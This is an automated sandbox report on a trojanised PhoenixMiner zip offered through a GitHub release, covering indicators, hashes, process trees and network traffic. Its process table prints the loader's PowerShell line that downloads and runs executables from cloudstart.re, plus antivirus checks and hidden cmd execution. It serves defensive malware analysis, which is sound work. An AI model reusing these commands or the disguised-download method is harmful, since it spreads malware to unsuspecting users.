URL:

https://github.com/minerphoenix-download/phoenixminer/releases/download/v5.9/PhoenixMiner_5.9d_Windows.zip

Full analysis: https://app.any.run/tasks/597c65cb-9bba-4a18-8733-ba108657de62
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 24, 2022, 21:45:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
miner
opendir
loader
Indicators:
MD5:

075B08814801D23F5E23A1FD64B22CDF

SHA1:

E35C525211719D711F00742C46D1FF941302DD74

SHA256:

FB9B6281AB6C0D057551B8E64777049AE0B6CB7A4F95B0B8C88409C904B5B4F4

SSDEEP:

3:N8tEd4GDpUVcAE2kC6cuYHpDMyM3Z:2uuGLArYcuKloZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • PhoenixMiner.exe (PID: 2852)
      • EIO.exe (PID: 3156)
      • xqyvnkiCUP.exe (PID: 2568)
      • Nemica.exe.pif (PID: 2868)
      • Nemica.exe.pif (PID: 3680)

    • Loads dropped or rewritten executable

      • EIO.exe (PID: 3156)

    • Runs app for hidden code execution

      • cmd.exe (PID: 2104)

    • Executes PowerShell scripts

      • cmd.exe (PID: 3784)

    • Uses TASKLIST.EXE to search for antiviruses

      • cmd.exe (PID: 2828)

    • Drops executable file immediately after starts

      • Nemica.exe.pif (PID: 2868)

    • Writes to a start menu file

      • cmd.exe (PID: 2940)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • chrome.exe (PID: 872)
      • WinRAR.exe (PID: 2092)
      • Nemica.exe.pif (PID: 2868)

    • Dropped object may contain URLs of mainers pools

      • WinRAR.exe (PID: 2092)

    • Reads the computer name

      • WinRAR.exe (PID: 2092)
      • EIO.exe (PID: 3156)
      • powershell.exe (PID: 1424)
      • PhoenixMiner.exe (PID: 2852)
      • Nemica.exe.pif (PID: 2868)

    • Checks supported languages

      • WinRAR.exe (PID: 2092)
      • EIO.exe (PID: 3156)
      • xqyvnkiCUP.exe (PID: 2568)
      • cmd.exe (PID: 4068)
      • PhoenixMiner.exe (PID: 2852)
      • cmd.exe (PID: 3536)
      • cmd.exe (PID: 3784)
      • powershell.exe (PID: 1424)
      • cmd.exe (PID: 2828)
      • Nemica.exe.pif (PID: 3680)
      • Nemica.exe.pif (PID: 2868)
      • cmd.exe (PID: 2104)
      • cmd.exe (PID: 2940)

    • Reads default file associations for system extensions

      • WinRAR.exe (PID: 2092)

    • Drops a file that was compiled in debug mode

      • WinRAR.exe (PID: 2092)

    • Application launched itself

      • cmd.exe (PID: 2104)
      • Nemica.exe.pif (PID: 3680)

    • Starts CMD.EXE for commands execution

      • xqyvnkiCUP.exe (PID: 2568)
      • cmd.exe (PID: 2104)
      • PhoenixMiner.exe (PID: 2852)

    • Starts application with an unusual extension

      • cmd.exe (PID: 2828)
      • Nemica.exe.pif (PID: 3680)

    • Reads mouse settings

      • Nemica.exe.pif (PID: 3680)
      • Nemica.exe.pif (PID: 2868)

    • Creates files in the user directory

      • cmd.exe (PID: 2940)

  • INFO

    • Checks supported languages

      • chrome.exe (PID: 2824)
      • chrome.exe (PID: 2888)
      • chrome.exe (PID: 3184)
      • chrome.exe (PID: 3588)
      • chrome.exe (PID: 3876)
      • chrome.exe (PID: 2740)
      • chrome.exe (PID: 2984)
      • chrome.exe (PID: 2492)
      • chrome.exe (PID: 872)
      • chrome.exe (PID: 4068)
      • chrome.exe (PID: 2620)
      • chrome.exe (PID: 3912)
      • waitfor.exe (PID: 3224)
      • findstr.exe (PID: 2232)
      • tasklist.exe (PID: 2124)
      • find.exe (PID: 3816)
      • chrome.exe (PID: 1652)

    • Application launched itself

      • chrome.exe (PID: 2824)

    • Reads the computer name

      • chrome.exe (PID: 3184)
      • chrome.exe (PID: 2824)
      • chrome.exe (PID: 3588)
      • chrome.exe (PID: 2492)
      • chrome.exe (PID: 4068)
      • chrome.exe (PID: 2620)
      • chrome.exe (PID: 3912)
      • tasklist.exe (PID: 2124)
      • waitfor.exe (PID: 3224)
      • chrome.exe (PID: 1652)

    • Reads the hosts file

      • chrome.exe (PID: 3588)
      • chrome.exe (PID: 2824)

    • Reads settings of System Certificates

      • chrome.exe (PID: 3588)
      • powershell.exe (PID: 1424)

    • Dropped object may contain Bitcoin addresses

      • WinRAR.exe (PID: 2092)

    • Checks Windows Trust Settings

      • powershell.exe (PID: 1424)

    • Reads the date of Windows installation

      • chrome.exe (PID: 1652)

    • Manual execution by user

      • cmd.exe (PID: 2940)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
72
Monitored processes
30
Malicious processes
4
Suspicious processes
5

Behavior graph

Click at the process to see the details
start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs winrar.exe eio.exe no specs phoenixminer.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs chrome.exe no specs cmd.exe no specs xqyvnkicup.exe no specs cmd.exe no specs cmd.exe no specs tasklist.exe no specs find.exe no specs findstr.exe no specs waitfor.exe no specs nemica.exe.pif no specs nemica.exe.pif cmd.exe chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
872"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1052,11373123984495570394,12710461487532574670,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exe
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
1424powershell -command If ($env:computername -eq 'DESKTOP-QO5QU33') {exit}; Import-Module BitsTransfer; Start-BitsTransfer -Source http://cloudstart.re/upd/cZbWmNX.exe,http://cloudstart.re/upd/PhoenixMiner.exe -Destination xqyvnkiCUP.exe,ePelsVwVdO.exe;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1652"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1052,11373123984495570394,12710461487532574670,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
86.0.4240.198
Modules
Images
c:\windows\system32\ntdll.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
2092"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\PhoenixMiner_5.9d_Windows.zip"C:\Program Files\WinRAR\WinRAR.exe
chrome.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\program files\winrar\winrar.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2104cmd /c cmd < Lascia.xllC:\Windows\system32\cmd.exexqyvnkiCUP.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2124tasklist /FI "imagename eq BullGuardCore.exe" C:\Windows\system32\tasklist.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
2232findstr /V /R "^cAQNgpUCdFmbAQcHplYvGkCgzkUVedHZDNfRjmHscebDYgLEWEAXfbflXCxefYAqYmTMADxKDHwDNYdyAfZbQKKubtUJtEevCbFnxYrzpPzHvMbYjfCZZrpgPNfvJLFYFEwdzRKBjFhqdeKLHf7f81a39-5f63-5b42-9efd-1f13b5431005quot; Battito.xll C:\Windows\system32\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
2492"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1052,11373123984495570394,12710461487532574670,131072 --enable-features=PasswordImport --gpu-preferences=MAAAAAAAAADgACAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2700 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shlwapi.dll
2568xqyvnkiCUP.exe C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\xqyvnkiCUP.execmd.exe
User:
admin
Company:
Lua.org
Integrity Level:
MEDIUM
Description:
Lua Language Run Time
Exit code:
0
Version:
5, 1, 4, 0
Modules
Images
c:\users\admin\appdata\local\temp\7zipsfx.000\xqyvnkicup.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2620"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1052,11373123984495570394,12710461487532574670,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
86.0.4240.198
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
Total events
12 499
Read events
12 362
Write events
137
Delete events
0

Modification events

(PID) Process:(2824) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(2824) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(2824) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
Operation:writeName:StatusCodes
Value:
(PID) Process:(2824) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
Operation:writeName:StatusCodes
Value:
01000000
(PID) Process:(2824) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(2824) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
Operation:writeName:dr
Value:
1
(PID) Process:(2824) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome
Operation:writeName:UsageStatsInSample
Value:
0
(PID) Process:(2824) chrome.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation:writeName:usagestats
Value:
0
(PID) Process:(2824) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
Operation:writeName:metricsid
Value:
(PID) Process:(2824) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
Operation:writeName:metricsid_installdate
Value:
0
Executable files
10
Suspicious files
22
Text files
150
Unknown types
2

Dropped files

PID
Process
Filename
Type
2824chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-61EF1E17-B08.pma
MD5:
SHA256:
2824chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\e9b084e9-d226-4ace-b14c-2068af9e8dc7.tmptext
MD5:
SHA256:
2824chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF13e850.TMPtext
MD5:8304B8F42465198890090F52D3F80A4C
SHA256:80C32AC2585E7E81200104B1630F19560A156C4ABF51B5888B0FBF07323FAB34
2824chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.oldtext
MD5:8FF312A95D60ED89857FEB720D80D4E1
SHA256:946A57FAFDD28C3164D5AB8AB4971B21BD5EC5BFFF7554DBF832CB58CC37700B
2824chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Versiontext
MD5:00046F773EFDD3C8F8F6D0F87A2B93DC
SHA256:593EDE11D17AF7F016828068BCA2E93CF240417563FB06DC8A579110AEF81731
2824chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old~RF13e7b4.TMPtext
MD5:B628564B8042F6E2CC2F53710AAECDC0
SHA256:1D3B022BDEE9F48D79E3EC1E93F519036003642D3D72D10B05CFD47F43EFBF13
2824chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old~RF13e708.TMPtext
MD5:81F483F77EE490F35306A4F94DB2286B
SHA256:82434CE3C9D13F509EBEEBE3A7A1A1DE9AB4557629D9FC855761E0CFA45E8BCE
2824chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF13e6f8.TMPtext
MD5:64AD8ED3E666540337BA541C549F72F7
SHA256:BECBDB08B5B37D203A85F2E974407334053BB1D2270F0B3C9A4DB963896F2206
2824chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.oldtext
MD5:5BD3C311F2136A7A88D3E197E55CF902
SHA256:FA331915E1797E59979A3E4BCC2BD0D3DEAA039B94D4DB992BE251FD02A224B9
2824chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datbinary
MD5:9C016064A1F864C8140915D77CF3389A
SHA256:0E7265D4A8C16223538EDD8CD620B8820611C74538E420A88E333BE7F62AC787
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
17
DNS requests
8
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
924
svchost.exe
GET
200
188.114.97.7:80
http://cloudstart.re/upd/PhoenixMiner.exe
US
executable
8.03 Mb
malicious
924
svchost.exe
GET
200
188.114.97.7:80
http://cloudstart.re/upd/cZbWmNX.exe
US
executable
1.06 Mb
malicious
924
svchost.exe
HEAD
200
188.114.97.7:80
http://cloudstart.re/upd/cZbWmNX.exe
US
malicious
924
svchost.exe
HEAD
200
188.114.97.7:80
http://cloudstart.re/upd/PhoenixMiner.exe
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3588
chrome.exe
142.250.186.174:443
clients2.google.com
Google Inc.
US
whitelisted
3588
chrome.exe
142.250.186.77:443
accounts.google.com
Google Inc.
US
suspicious
3588
chrome.exe
185.199.108.133:443
objects.githubusercontent.com
GitHub, Inc.
NL
malicious
3588
chrome.exe
142.250.186.35:443
ssl.gstatic.com
Google Inc.
US
whitelisted
3588
chrome.exe
142.250.186.142:443
sb-ssl.google.com
Google Inc.
US
whitelisted
3588
chrome.exe
140.82.121.4:443
github.com
US
malicious
924
svchost.exe
188.114.97.7:80
cloudstart.re
Cloudflare Inc
US
malicious

DNS requests

Domain
IP
Reputation
accounts.google.com
  • 142.250.186.77
shared
github.com
  • 140.82.121.4
malicious
clients2.google.com
  • 142.250.186.174
whitelisted
objects.githubusercontent.com
  • 185.199.108.133
  • 185.199.111.133
  • 185.199.109.133
  • 185.199.110.133
shared
ssl.gstatic.com
  • 142.250.186.35
whitelisted
sb-ssl.google.com
  • 142.250.186.142
whitelisted
cloudstart.re
  • 188.114.97.7
  • 188.114.96.7
malicious
fnlEVjySYIjnLMqDvvAl.fnlEVjySYIjnLMqDvvAl
unknown

Threats

PID
Process
Class
Message
924
svchost.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
924
svchost.exe
Misc activity
ET INFO Packed Executable Download
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://github.com/minerphoenix-download/phoenixminer/releases/download/v5.9/PhoenixMiner_5.9d_Windows.zip